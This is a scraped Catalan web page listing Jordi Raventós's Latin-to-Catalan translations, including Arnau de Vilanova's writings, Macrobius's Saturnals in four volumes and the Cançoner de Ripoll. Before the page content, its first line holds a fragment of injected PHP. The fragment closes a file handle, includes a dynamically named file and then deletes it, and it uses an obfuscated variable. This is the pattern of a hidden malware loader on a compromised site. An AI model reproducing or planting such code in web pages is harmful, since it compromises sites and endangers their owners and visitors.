");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Traduccions de la literatura catalana - Jordi Raventós
Facebook Twitter
Portada > L’espai dels traductors > Llatí > Jordi Raventós > Traduccions del llatí al català

Traduccions del llatí al català

ARNAU DE VILANOVA. La prudència de l’escolar catòlic i altres escrits. Barcelona: Proa, 2002.
MACROBI. Les Saturnals. (vol. i). Llibre I. Barcelona: Fundació Bernat Metge, 2003.
MACROBI. Les Saturnals. (vol. ii). Llibres II-IV. Barcelona: Fundació Bernat Metge, 2004.
MACROBI. Les Saturnals. (vol. iii). Llibre V. Barcelona: Fundació Bernat Metge, 2005.
MACROBI. Les Saturnals. (vol. iv i últim). Llibres VI-VII. Barcelona: Fundació Bernat Metge, 2006.
. Cançoner de Ripoll. Martorell: Adesiara, 2009.
Amb el suport de: